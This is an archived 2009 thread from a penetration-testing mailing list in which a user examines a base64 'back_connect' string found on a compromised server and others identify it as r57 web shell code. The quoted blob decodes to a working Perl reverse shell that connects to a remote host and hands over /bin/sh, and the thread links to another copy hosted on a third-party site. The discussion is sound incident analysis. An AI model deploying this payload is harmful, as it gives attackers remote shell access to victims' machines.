Penetration Testing mailing list archives
Re: connect back PHP hack
From: "sr." <staticrez () gmail com>
Date: Tue, 10 Feb 2009 14:34:37 -0500
i really appreciate all of the responses. this is what community is all about. i'd seen the "==" in other encoding schemes, but just wasn't sure and wanted a quick response...thanks to everyone who responded! I'll post the rest of my findings on here asap. i'm looking into an old compromised machine. this is nothing new.. whoever mentioned the r57 shell, you're probably right as the script connects to a remote box @ port 11457. this is r57 behaviour. i also found a copy of the same script i'm dissecting on someone else's box, you can check it out here: http://www.menola.org/~matjaz/images/info/o_meni/config.inc.php in my case, a bunch of php files were modified. i'll zip everything up and host it so you can all analyze... thx, sr. aka "fabrizio siciliano" On Tue, Feb 10, 2009 at 2:10 PM, Gustavo Castro <gcastrop () gmail com> wrote:
"Sr." This is base64 encoded. 2009/2/10 sr. <staticrez () gmail com>:can anyone tell me what encoding this is? $back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw=="; this has to do with old php 4.x.x version with magic quotes enabled. i'm just trying to figure out what the connect back code does. any input is much appreciated. thx, sr.-- Saludos, Gustavo Castro Puig. E-Mail: gcastrop () gmail com LPI Level-1 Certified (https://www.lpi.org/es/verify.html LPID:LPI000042304 Verification Code: hp6re8w5qg ) -----BEGIN GEEK CODE BLOCK----- Version: 3.12 GCS/CM/IT/ED dx s-:- a? C(+++)$ UL++++*$ P+ L++++(++)$ E--- W+++$ N+ o? K- w O M V-- PS PE++(-) Y-(+) PGP+ t(++) 5+ X++ R tv+ b++(++++) DI+++ D++ G++ e++ h--- r y+++ ------END GEEK CODE BLOCK------ Registered Linux User #69342
Current thread:
- connect back PHP hack sr. (Feb 10)
- Re: [Full-disclosure] connect back PHP hack Razi Shaban (Feb 10)
- Re: connect back PHP hack Steffen Wendzel (Feb 10)
- Message not available
- Re: connect back PHP hack sr. (Feb 10)
- Re: connect back PHP hack Justin Rogosky (Feb 11)
- Re: connect back PHP hack David Howe (Feb 12)
- Re: connect back PHP hack sr. (Feb 10)